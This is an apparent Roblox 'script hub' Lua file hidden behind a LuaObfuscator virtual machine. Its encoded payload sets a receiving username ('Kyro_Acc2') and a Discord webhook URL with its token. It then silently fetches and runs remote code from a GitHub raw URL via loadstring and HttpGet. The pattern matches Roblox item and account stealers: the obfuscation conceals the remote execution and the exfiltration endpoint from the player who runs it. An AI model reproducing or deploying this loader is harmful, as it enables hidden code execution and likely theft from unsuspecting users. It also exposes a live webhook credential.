--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.5) ~  Much Love, Ferib 

]]--

do local v0=0;local v1;local v2;local v3;local v4;local v5;local v6;local v7;local v8;local v9;local v10;local v11;local v12;local v13;local v14;local v15;local v16;while true do if (v0==0) then v1=tonumber;v2=string.byte;v3=string.char;v4=string.sub;v0=1;end if (v0==3) then v13=select;v14=unpack or table.unpack ;v15=tonumber;v16=nil;v0=4;end if (4==v0) then function v16(v25,v26,...)local v27=0;local v28;local v29;local v30;local v31;local v32;local v33;local v34;local v35;local v36;local v37;local v38;local v39;while true do if (v27==2) then function v31()local v48=v2(v25,v28,v28);v28=v28 + 1 ;return v48;end v32=nil;function v32()local v49=1958 -(1161 + 797) ;local v50;local v51;while true do if (v49==(0 + 0)) then v50,v51=v2(v25,v28,v28 + 2 );v28=v28 + 1 + 1 ;v49=1 -(0 -0) ;end if ((187 -(103 + 83))==v49) then return (v51 * (713 -(391 + 66))) + v50 ;end end end v27=3;end if (v27==0) then v28=1;v29=nil;v25=v5(v4(v25,5),"..",function(v40)if (v2(v40,2)==79) then local v79=0;while true do if (v79==0) then v29=v1(v4(v40,1,1));return "";end end else local v80=0;local v81;while true do if (v80==0) then v81=v3(v1(v40,16));if v29 then local v102=0;local v103;while true do if (v102==0) then v103=v6(v81,v29);v29=nil;v102=1;end if (v102==1) then return v103;end end else return v81;end break;end end end end);v27=1;end if (v27==4) then function v34()local v52=0 -0 ;local v53;local v54;local v55;local v56;local v57;local v58;while true do if (v52==((1294 -(1233 + 50)) -8)) then if (v57==(0 -(0 + 0))) then if (v56==0) then return v58 * (0 -0) ;else local v104=0 + 0 ;while true do if (v104==0) then v57=4 -3 ;v55=0;break;end end end elseif (v57==(1288 + 759)) then return ((v56==(0 + 0)) and (v58 * ((182 -((2016 -(1798 + 67)) + 30))/0))) or (v58 * NaN) ;end return v9(v58,v57-(2131 -1108) ) * (v55 + (v56/((7 -(5 + 0))^(48 + 4)))) ;end if ((182 -((87 -(39 + 18)) + 150))==v52) then v57=v30(v54,(319 -(70 + 167)) -61 ,23 + 8 );v58=((v30(v54,32)==(3 -2)) and  -1) or 1 ;v52=973 -(610 + 360) ;end if (v52==(0 -0)) then v53=v33();v54=v33();v52=1 -0 ;end if (((3636 -2714) -(457 + (610 -146)))==v52) then v55=2 -(1 + 0) ;v56=(v30(v54,1 -0 ,91 -71 ) * (2^32)) + v53 ;v52=1 + 1 ;end end end v35=nil;function v35(v41)local v59=(0 + 0) -0 ;local v60;local v61;while true do if (v59==((263 + 410) -((1320 -858) + 208))) then return v7(v61);end if (v59==(1 + (718 -(223 + 495)))) then v60=v4(v25,v28,(v28 + v41) -(1 + 0) );v28=v28 + v41 ;v59=4 -2 ;end if ((7 -5)==v59) then v61={};for v90=1 + 0 , #v60 do v61[v90]=v3(v2(v4(v60,v90,v90)));end v59=1 + 2 ;end if (v59==0) then v60=nil;if  not v41 then local v92=847 -(370 + (2047 -(616 + 954))) ;while true do if (v92==(0 + 0)) then v41=v33();if (v41==((3459 -(1241 + 697)) -(366 + 1155))) then return "";end break;end end end v59=56 -(48 + 6 + 1) ;end end end v27=5;end if (v27==3) then v33=nil;function v33()local v62,v63,v64,v65=v2(v25,v28,v28 + 1 + 2 );v28=v28 + 4 ;return (v65 * (10678193 + 6099023)) + (v64 * (45294 + 20242)) + (v63 * 256) + v62 ;end v34=nil;v27=4;end if (v27==5) then v36=v33;v37=nil;function v37(...)return {...},v13("#",...);end v27=6;end if (1==v27) then v30=nil;function v30(v42,v43,v44)if v44 then local v82=(v42/(2^(v43-(1 + 0))))%((1 + 1)^(((v44-((1 + 1) -1)) -(v43-(1272 -(766 + 505)))) + ((962 -(177 + 784)) -0))) ;return v82-(v82%(1 + 0)) ;else local v83=0 + 0 ;local v84;while true do if (v83==(0 + 0)) then v84=(2 + 0)^(v43-(1 + 0)) ;return (((v42%(v84 + v84))>=v84) and (2 -1)) or (0 + 0 + (0 -0)) ;end end end end v31=nil;v27=2;end if (v27==6) then v38=nil;function v38()local v66=0 + 0 ;local v67;local v68;local v69;local v70;local v71;local v72;local v73;local v74;while true do if (v66~=(0 -0)) then else v67=0;v68=nil;v66=1 + 0 ;end if (v66==(631 -(265 + 362))) then while true do if (v67~=(2 -0)) then else local v99=0;while true do if (v99~=0) then else v72=nil;v73=nil;v99=1 + 0 ;end if (v99==(1925 -(394 + 1530))) then v67=11 -8 ;break;end end end if (v67~=(725 -(423 + 301))) then else local v100=1155 -(944 + 211) ;while true do if (v100==(1355 -(105 + 1249))) then v67=2;break;end if (v100~=(1286 -(930 + 356))) then else v70=nil;v71=nil;v100=1 -0 ;end end end if (v67~=(463 -(130 + 333))) then else local v101=0 + 0 ;while true do if (v101==(0 + 0)) then v68=0 + 0 ;v69=nil;v101=2 -1 ;end if (v101~=1) then else v67=1380 -(1330 + 49) ;break;end end end if (v67==3) then v74=nil;while true do local v105=635 -(536 + 99) ;local v106;while true do if (v105==(0 -0)) then v106=1505 -(850 + 655) ;while true do if ((0 + 0)==v106) then if (v68~=(715 -(334 + 379))) then else local v126=0;local v127;local v128;while true do if (v126~=(0 -0)) then else v127=0 -0 ;v128=nil;v126=1466 -(1183 + 282) ;end if (v126==1) then while true do if (v127==0) then v128=0 + 0 ;while true do if (v128~=(1905 -(862 + 1043))) then else for v142=1265 -(476 + 788) ,v73 do local v143=0 -0 ;local v144;local v145;local v146;local v147;while true do if (v143==(6 -4)) then while true do if (v144~=(84 -(40 + 43))) then else v147=nil;while true do if ((1 + 0)==v145) then if (v146==(2 -1)) then v147=v31()~=0 ;elseif (v146==(1 + 1)) then v147=v34();elseif (v146~=(406 -(397 + 6))) then else v147=v35();end v74[v142]=v147;break;end if (v145==0) then v146=v31();v147=nil;v145=122 -(38 + 83) ;end end break;end if (v144~=(319 -(183 + 136))) then else local v180=1299 -(900 + 399) ;while true do if (v180~=(0 + 0)) then else v145=0;v146=nil;v180=1 + 0 ;end if (v180~=(1 + 0)) then else v144=1 -0 ;break;end end end end break;end if (v143==(1 -0)) then v146=nil;v147=nil;v143=1083 -(293 + 788) ;end if (v143~=0) then else v144=1735 -(285 + 1450) ;v145=nil;v143=1;end end end v72[482 -(250 + 229) ]=v31();v128=1713 -(1703 + 9) ;end if (v128==1) then for v148=1166 -(308 + 857) ,v33() do local v149=0 + 0 ;local v150;local v151;local v152;while true do if (v149==(2 -1)) then v152=nil;while true do if (v150~=(3 -2)) then else while true do if (v151==0) then v152=v31();if (v30(v152,1 + 0 ,1187 -(899 + 287) )==0) then local v193=0 + 0 ;local v194;local v195;local v196;local v197;while true do if (v193~=(940 -(29 + 909))) then else while true do if (v194==(0 -0)) then local v203=0;while true do if (v203~=(0 -0)) then else v195=v30(v152,1404 -(198 + 1204) ,13 -10 );v196=v30(v152,1 + 3 ,17 -11 );v203=1 + 0 ;end if ((1 + 0)==v203) then v194=1;break;end end end if (v194~=(6 -4)) then else if (v30(v196,1,1 + 0 )~=(67 -(9 + 57))) then else v197[3 -1 ]=v74[v197[2 + 0 ]];end if (v30(v196,2,1683 -(762 + 919) )~=(2 -1)) then else v197[3]=v74[v197[3]];end v194=1 + 2 ;end if (v194==(1974 -(80 + 1891))) then if (v30(v196,1 + 2 ,6 -3 )~=(1 + 0)) then else v197[4]=v74[v197[1290 -(955 + 331) ]];end v69[v148]=v197;break;end if (v194~=1) then else local v205=1034 -(793 + 241) ;local v206;while true do if (v205~=(1861 -(1548 + 313))) then else v206=0;while true do if (v206==(0 -0)) then local v215=0;while true do if (1==v215) then v206=1 -0 ;break;end if (v215~=(1714 -(362 + 1352))) then else v197={v32(),v32(),nil,nil};if (v195==0) then local v216=0 -0 ;local v217;local v218;while true do if (v216~=1) then else while true do if (v217~=(350 -(157 + 193))) then else v218=0 + 0 ;while true do if (v218==(0 -0)) then v197[2 + 1 ]=v32();v197[9 -5 ]=v32();break;end end break;end end break;end if (v216==0) then v217=591 -(512 + 79) ;v218=nil;v216=3 -2 ;end end elseif (v195==(1 + 0)) then v197[3]=v33();elseif (v195==(5 -3)) then v197[2 + 1 ]=v33() -((105 -(20 + 83))^16) ;elseif (v195~=3) then else local v221=0 -0 ;local v222;local v223;while true do if ((0 + 0)~=v221) then else local v226=1192 -(412 + 780) ;while true do if (v226~=(0 -0)) then else v222=0;v223=nil;v226=2 -1 ;end if (v226~=(349 -(10 + 338))) then else v221=755 -(290 + 464) ;break;end end end if (v221~=(417 -(127 + 289))) then else while true do if (v222==0) then v223=0 -0 ;while true do if (v223~=(1630 -(1321 + 309))) then else v197[3]=v33() -((2 + 0)^(1358 -(1286 + 56))) ;v197[4]=v32();break;end end break;end end break;end end end v215=1;end end end if (v206~=(1487 -(1149 + 337))) then else v194=2;break;end end break;end end end end break;end if (v193==0) then v194=1092 -(232 + 860) ;v195=nil;v193=3 -2 ;end if ((1 + 0)==v193) then v196=nil;v197=nil;v193=1749 -(1384 + 363) ;end end end break;end end break;end if (v150~=(0 + 0)) then else local v181=0 -0 ;while true do if (v181~=(651 -(527 + 124))) then else v151=0 + 0 ;v152=nil;v181=1930 -(511 + 1418) ;end if (v181==(1039 -(1032 + 6))) then v150=2 -1 ;break;end end end end break;end if ((1935 -(1358 + 577))~=v149) then else v150=0 + 0 ;v151=nil;v149=3 -2 ;end end end v68=3;break;end end break;end end break;end end end if (v68==(1449 -(756 + 690))) then local v129=0 + 0 ;local v130;local v131;while true do if ((2 -1)==v129) then while true do if ((969 -(215 + 754))~=v130) then else v131=0;while true do local v139=0;while true do if (v139~=(0 -0)) then else if ((1177 -(405 + 771))==v131) then return v72;end if (v131==(0 -0)) then local v173=0 + 0 ;while true do if (v173~=0) then else for v182=2 -1 ,v33() do v70[v182-1 ]=v38();end for v184=1 + 0 ,v33() do v71[v184]=v33();end v173=1 + 0 ;end if (1~=v173) then else v131=1;break;end end end break;end end end break;end end break;end if ((0 + 0)==v129) then v130=0 + 0 ;v131=nil;v129=1;end end end v106=2 -1 ;end if (v106~=1) then else if (v68==(139 -(40 + 98))) then local v132=0;local v133;while true do if (v132==(0 -0)) then v133=0 + 0 ;while true do if (v133==(1 + 0)) then v74={};v68=569 -(486 + 81) ;break;end if (v133~=(0 -0)) then else local v138=1055 -(816 + 239) ;while true do if (v138==(1 + 0)) then v133=1;break;end if (v138~=(0 -0)) then else local v141=0 -0 ;while true do if (v141~=(1 -0)) then else v138=1;break;end if (v141~=(308 -(29 + 279))) then else v72={v69,v70,nil,v71};v73=v33();v141=1 + 0 ;end end end end end end break;end end end if (v68==(136 -(51 + 85))) then local v134=0 + 0 ;while true do if (v134==(578 -(259 + 319))) then local v135=679 -(217 + 462) ;while true do if (v135~=(0 + 0)) then else v69={};v70={};v135=3 -2 ;end if (v135==(358 -(106 + 251))) then v134=1890 -(590 + 1299) ;break;end end end if ((1937 -(561 + 1375))~=v134) then else v71={};v68=1;break;end end end break;end end break;end end end break;end end break;end if ((2 + 0)==v66) then v71=nil;v72=nil;v66=1 + 2 ;end if (v66~=(3 + 0)) then else local v85=0;while true do if (v85~=(1652 -(1140 + 512))) then else v73=nil;v74=nil;v85=1;end if ((1 + 0)~=v85) then else v66=3 + 1 ;break;end end end if ((2 -1)~=v66) then else local v86=1008 -(322 + 686) ;while true do if ((3 -2)==v86) then v66=2 + 0 ;break;end if (v86~=(92 -(12 + 80))) then else v69=nil;v70=nil;v86=1 + 0 ;end end end end end v39=nil;v27=7;end if (v27==7) then function v39(v45,v46,v47)local v75=0;local v76;local v77;local v78;while true do if (0==v75) then v76=v45[1];v77=v45[2];v75=1;end if (v75==1) then v78=v45[3];return function(...)local v93=0;local v94;local v95;local v96;local v97;local v98;while true do if (v93==0) then v94=1;v95= -1;v93=1;end if (3==v93) then A,B=v37(v12(v98));if  not A[1] then local v107=v45[4][v94] or "?" ;error("Script error at ["   .. v107   .. "]:"   .. A[2] );else return v14(A,2,B);end break;end if (v93==1) then v96={...};v97=v13("#",...) -1 ;v93=2;end if (v93==2) then v98=nil;function v98()local v108=v76;local v109=v77;local v110=v78;local v111=v37;local v112={};local v113={};local v114={};for v118=0 + 0 ,v97 do if (((2747 -(511 + 1026))<4008) and (v118>=v110)) then v112[v118-v110 ]=v96[v118 + (690 -(577 + 112)) ];else v114[v118]=v96[v118 + (2 -1) ];end end local v115=(v97-v110) + (2 -1) ;local v116;local v117;while true do local v119=1328 -(1291 + (87 -50)) ;local v120;local v121;while true do if ((v119==(105 -(14 + 91))) or ((280 + 306 + 254 + 485)>4549)) then v120=0 + 0 ;v121=nil;v119=1 + 0 ;end if ((v119==(2 -1)) or ((6207 -(474 + 847 + 110))>=4968)) then while true do if ((2077<=((6265 -3921) + 1346)) and (v120==(0 -0))) then v121=29 -(18 + 11) ;while true do if ((v121==(1264 -(726 + 537))) or (((28600 -22237) -3804)<(2429 -(185 + 536)))) then if ((v117<=(11 -8)) or ((2992 + 715)>=((7363 -(114 + 776)) -(1465 + 29)))) then if ((v117<=(668 -(18 + 649))) or ((5833 -(970 + 10))<(6203 -(5965 -(1499 + 208))))) then if (((1608 + 1892)>(3165 -(887 + (1684 -(720 + 91))))) and (v117>(0 -0))) then do return;end else v114[v116[(1852 -1209) -((1377 -(912 + 172)) + 348) ]]=v47[v116[3 -0 ]];end elseif ((v117==(275 -(224 + 49))) or ((2073 -(653 + 665))>(414 + 964))) then local v155=778 -(39 + 34 + 705) ;local v156;local v157;while true do if ((v155==(1 -0)) or ((3985 + 206)==(638 + 2110))) then while true do if ((v156==((0 -0) + 0)) or (((4235 + 1698) -(860 + 270))<=(3209 -((2325 -951) + (685 -(367 + 44)))))) then v157=v116[(8 -4) -2 ];v114[v157]=v114[v157](v14(v114,v157 + 1 + 0 + (0 -0) ,v95));break;end end break;end if ((581<(4825 -(845 + 134))) and (v155==(0 + 0))) then v156=1166 -((1477 -(274 + 471)) + (1339 -(149 + 756))) ;v157=nil;v155=203 -(109 + (146 -(10 + 43))) ;end end else local v158=0 -0 ;local v159;local v160;while true do if (((3973 -(4487 -2008))<(3301 -(1298 + 20))) and (v158==(1 + 0))) then v114[v159 + 1 + 0 ]=v160;v114[v159]=v160[v116[(13 -8) -1 ]];break;end if ((v158==(0 + 0)) or (((3852 -(1223 + 436)) -(6 + 8))==(3546 + 381))) then local v177=457 -(207 + 250) ;while true do if ((v177==(1 -0)) or ((1663 + 1383)==(19145 -14785))) then v158=1 -0 ;break;end if (((3897 -((561 -244) + 1105))==(4454 -(1331 + (1321 -673)))) and (v177==(0 -0))) then v159=v116[(3 + 3) -4 ];v160=v114[v116[2 + 1 ]];v177=1 + 0 ;end end end end end elseif ((v117<=(1934 -(1399 + 342 + 188))) or ((2792 -(1688 -(101 + 512)))<((161 + 32) -45))) then if (((1809 + 1295)>(9244 -6194)) and (v117>4)) then v114[v116[8 -(1408 -(543 + 859)) ]][v116[5 -2 ]]=v116[1779 -(391 + 1384) ];else local v163=0 + 0 ;local v164;local v165;local v166;local v167;local v168;local v169;while true do if (((4637 -3014)<=(629 + 1597)) and ((1 -0)==v163)) then v166=nil;v167=nil;v163=1 + 1 ;end if (((5043 -(233 + 1388))>=(541 + 455)) and (v163==2)) then v168=nil;v169=nil;v163=2 + 1 ;end if ((v163==(345 -(102 + 240))) or (1487>(325 + (9061 -4804)))) then while true do if ((1272==(2139 -867)) and (v164==(455 -(327 + 128)))) then v165=0 + 0 ;v166=nil;v164=1972 -(1282 + 689) ;end if (((2 -1)==v164) or (((3877 -(6 + 452)) -(590 + 139))<(2683 -(16 + 3 + 50)))) then v167=nil;v168=nil;v164=2 + (0 -0) ;end if ((v164==(1257 -(1199 + 56))) or ((3243 -(345 + 188))<(1519 + 947))) then v169=nil;while true do if ((v165==(2 + 0)) or ((2511 -(30 + 169))<((954 + 447) -(158 + 63)))) then for v198=v166,v95 do local v199=559 -(319 + 154 + 86) ;local v200;while true do if (((4996 -((2051 -(362 + 1582)) + 367))>(2308 -((873 -518) + 192))) and (v199==((3131 -(655 + 624)) -(635 + 1217)))) then v200=965 -(809 + 156) ;while true do if (((0 -(1279 -(234 + 1045)))==v200) or ((15848 -11817)<(4149 -(840 + 6)))) then v169=v169 + 1 + 0 ;v114[v198]=v167[v169];break;end end break;end end end break;end if ((v165==(284 -(47 + (682 -445)))) or ((5243 -1616)<=(6516 -(5162 -(1354 + 407))))) then local v191=530 -((485 -179) + 224) ;while true do if (((3 -2)==v191) or ((3005 -(2518 -(24 + 1433)))<=(1656 -850))) then v165=235 -(120 + (1068 -(603 + 351))) ;break;end if (((4114 -2487)<=(6077 -(746 + 641))) and (v191==(0 + 0))) then v166=v116[432 -(353 + 77) ];v167,v168=v111(v114[v166](v14(v114,v166 + (4 -3) ,v116[2 + 1 ])));v191=1 + 0 ;end end end if (((4414 + 52)>=(19257 -14834)) and (v165==(1 + 0 + 0))) then local v192=0 -(0 + 0) ;while true do if ((v192==(483 -(328 + 32 + 122))) or (((12589 -7538) -3240)==(3049 -((1252 -(312 + 562)) + 699)))) then v165=1960 -(1782 + 176) ;break;end if (((901 + 3796)>=(347 + 1143)) and (v192==(1994 -(158 + 1836)))) then local v202=(0 -0) + 0 ;while true do if (((2593 -(356 + 33 + 118))>((894 + 256) -(1552 -(509 + 149)))) and (v202==(1 -(0 + 0)))) then v192=2 -1 ;break;end if ((v202==(0 -0)) or (((222 + 1983) -(263 + (2845 -1828)))>=(1676 + (3788 -2255)))) then v95=(v168 + v166) -(2 -(1 + 0)) ;v169=1083 -(178 + 905) ;v202=3 -2 ;end end end end end end break;end end break;end if (((4936 -2541)>=(1656 -(377 + 953))) and ((0 -0)==v163)) then v164=0 + 0 ;v165=nil;v163=1 + (881 -(406 + 475)) ;end end end elseif ((v117>(21 -(7 + 8))) or ((4198 -(166 + 1493))<=(1196 -((2375 -(1601 + 157)) + 266)))) then v114[v116[1724 -(1425 + 297) ]]=v116[(2123 -(1183 + 755)) -(47 + 135) ];else v114[v116[1213 -(142 + 703 + 366) ]]();end v94=v94 + ((1 + 0) -0) ;break;end if (((0 + (476 -(294 + 182)))==v121) or ((4018 -1692)==((3214 -1168) -(2165 -1469)))) then local v136=1223 -(995 + 228) ;local v137;while true do if (((4 + 373)==(1088 -711)) and (v136==(45 -(24 + 21)))) then v137=0 + 0 ;while true do if (((251 -164)<(4265 -((1343 -(711 + 228)) + (1762 -(623 + 562))))) and (v137==1)) then v121=1 + (0 -0) ;break;end if ((v137==(0 -0)) or ((9062 -(6420 -(747 + 807)))==(666 + 336))) then local v172=179 -(145 + 34) ;while true do if (((1 + 0 + 0)==v172) or (((5365 -(1587 + 396)) -(45 + 18))==(4050 -(649 + 1055)))) then v137=(2 -1) + (0 -0) ;break;end if (((4739 -(441 + 914))==(1998 + 647 + 739)) and (v172==(0 -(0 + 0)))) then v116=v108[v94];v117=v116[1 + 0 ];v172=2 -1 ;end end end end break;end end end end break;end end break;end end end end v93=3;end end end;end end end return v39(v38(),{},v26)(...);end end end v16("LOL!0B3O0003023O005F4703083O00557365726E616D6503093O004B79726F5F412O633203073O004875624E616D65030C3O004D69636B7920536372697074030A3O00576562682O6F6B55726C03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F31302O393730353731382O31353934323433302F6F6431786D33744A6836422O596E2O63513678697565474C7A49714D4A694B50644F6D795370586D704C4E2O755F62785364364B68324B2O63426553415362674F72695F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4A61792O696F6365616E2O692F5065616B4F6E546F702F6D61696E2F7065616B2E6C7561000E3O00124O00013O0030053O0002000300124O00013O0030053O0004000500124O00013O0030053O0006000700124O00083O00122O000100093O00200300010001000A0012070003000B4O0004000100034O00025O00022O00063O000100012O00013O00017O000E3O00023O00023O00033O00033O00043O00043O00053O00053O00053O00053O00053O00053O00053O00063O00",v10(),...);break;end if (v0==2) then v9=math.ldexp;v10=getfenv or function()return _ENV;end ;v11=setmetatable;v12=pcall;v0=3;end if (1==v0) then v5=string.gsub;v6=string.rep;v7=table.concat;v8=table.insert;v0=2;end end end
